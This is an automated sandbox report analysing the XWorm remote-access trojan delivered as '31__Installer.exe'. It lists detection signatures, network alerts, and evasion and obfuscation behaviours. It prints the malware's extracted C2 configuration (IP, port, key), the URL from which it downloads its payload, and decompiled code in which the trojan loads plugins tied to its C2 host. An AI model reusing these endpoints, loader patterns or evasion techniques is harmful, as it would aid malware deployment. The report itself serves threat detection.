Edit tour

Windows Analysis Report
31__Installer.exe

Overview

General Information

Sample name:	31__Installer.exe
Analysis ID:	1466311
MD5:	cc1bb6a11aa1706bcbc42f04d1b1d865
SHA1:	b4555a73799aa255c431c227db3958e6286d6977
SHA256:	96d3ad9b885e0a57a37a84582d6a681f98d5e71b11e952082a7b610026198b00
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

31__Installer.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\31__Installer.exe" MD5: CC1BB6A11AA1706BCBC42F04D1B1D865)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["156.238.235.31"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x1207d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\Public\Downloads\ind.jpg	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: 31__Installer.exe PID: 7148	JoeSecurity_XWorm	Yara detected XWorm	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.31__Installer.exe.5450000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.31__Installer.exe.5450000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6af2:$cnc4: POST / HTTP/1.1
0.2.31__Installer.exe.5450000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.31__Installer.exe.5450000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4cf2:$cnc4: POST / HTTP/1.1

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 156.238.235.31 - Destination IP: 192.168.2.8

Timestamp:	07/02/24-19:26:55.721304
SID:	2852874
Source Port:	7000
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 156.238.235.31 - Destination IP: 192.168.2.8

Timestamp:	07/02/24-19:27:04.946686
SID:	2852870
Source Port:	7000
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.8 - Destination IP: 156.238.235.31

Timestamp:	07/02/24-19:23:17.813584
SID:	2855924
Source Port:	49706
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.8 - Destination IP: 156.238.235.31

Timestamp:	07/02/24-19:27:04.947576
SID:	2852923
Source Port:	49706
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.8 - Destination IP: 156.238.235.31

Timestamp:	07/02/24-19:24:43.950928
SID:	2853193
Source Port:	49706
Destination Port:	7000
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://guanlix.cn:881/31.ccp

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["156.238.235.31"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for submitted file

Source: 31__Installer.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 31__Installer.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.31__Installer.exe.5450000.1.raw.unpack	String decryptor: 156.238.235.31
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack	String decryptor: 7000
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack	String decryptor: XWorm V5.6
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack	String decryptor: USB.exe

Source: 31__Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 31__Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49706 -> 156.238.235.31:7000
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 156.238.235.31:7000 -> 192.168.2.8:49706
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.8:49706 -> 156.238.235.31:7000
Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 156.238.235.31:7000 -> 192.168.2.8:49706
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49706 -> 156.238.235.31:7000

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 156.238.235.31

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49705

Source: global traffic	TCP traffic: 192.168.2.8:49705 -> 91.208.240.157:881
Source: global traffic	TCP traffic: 192.168.2.8:49706 -> 156.238.235.31:7000

Source: Joe Sandbox View

ASN Name: XHOSTSERVERUS XHOSTSERVERUS

Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31
Source: unknown	TCP traffic detected without corresponding DNS query: 156.238.235.31

Source: C:\Users\user\Desktop\31__Installer.exe

Code function: 0_2_003E25AD __EH_prolog,InternetReadFile,

0_2_003E25AD

Source: global traffic

HTTP traffic detected: GET /31.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: guanlix.cn
Source: global traffic	DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa

Source: 31__Installer.exe	String found in binary or memory: http://guanlix.cn:881/31.ccp
Source: 31__Installer.exe, 00000000.00000003.1678316988.000000000097E000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000002.3816556651.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://guanlix.cn:881/31.ccpG
Source: 31__Installer.exe, 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.31__Installer.exe.5450000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\31__Installer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F000E	0_2_003F000E
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F5A2A	0_2_003F5A2A
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003EFB79	0_2_003EFB79
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F0B66	0_2_003F0B66
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F03AC	0_2_003F03AC
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F738F	0_2_003F738F
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F54D9	0_2_003F54D9
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F6657	0_2_003F6657
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F077E	0_2_003F077E
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F5F7B	0_2_003F5F7B
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003F7F4F	0_2_003F7F4F
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_054655D8	0_2_054655D8
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_0546B408	0_2_0546B408
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_0546A6B8	0_2_0546A6B8
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_05464D08	0_2_05464D08
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_0546ED84	0_2_0546ED84
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_054607A0	0_2_054607A0
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_054649C0	0_2_054649C0

Source: C:\Users\user\Desktop\31__Installer.exe

Code function: String function: 003EA940 appears 45 times

Source: 31__Installer.exe, 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs 31__Installer.exe
Source: 31__Installer.exe, 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewindos.exe. vs 31__Installer.exe
Source: 31__Installer.exe	Binary or memory string: OriginalFilenamewindos.exe. vs 31__Installer.exe

Source: 31__Installer.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.31__Installer.exe.5450000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPED	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@2/2

Source: C:\Users\user\Desktop\31__Installer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp

Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\31__Installer.exe	Mutant created: \Sessions\1\BaseNamedObjects\DMTpmF9DC6Wmoh6u

Source: 31__Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\31__Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 31__Installer.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\31__Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: 31__Installer.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 31__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 31__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 31__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 31__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 31__Installer.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\31__Installer.exe

Code function: 0_2_003F40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_003F40E4

Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003E4948 push eax; ret	0_2_003E4966
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003EA985 push ecx; ret	0_2_003EA998
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_003E6649 push ecx; ret	0_2_003E665C
Source: C:\Users\user\Desktop\31__Installer.exe	Code function: 0_2_05466B88 pushad ; ret	0_2_05466B89

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 881
Source: unknown	Network traffic detected: HTTP traffic on port 881 -> 49705

Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31__Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
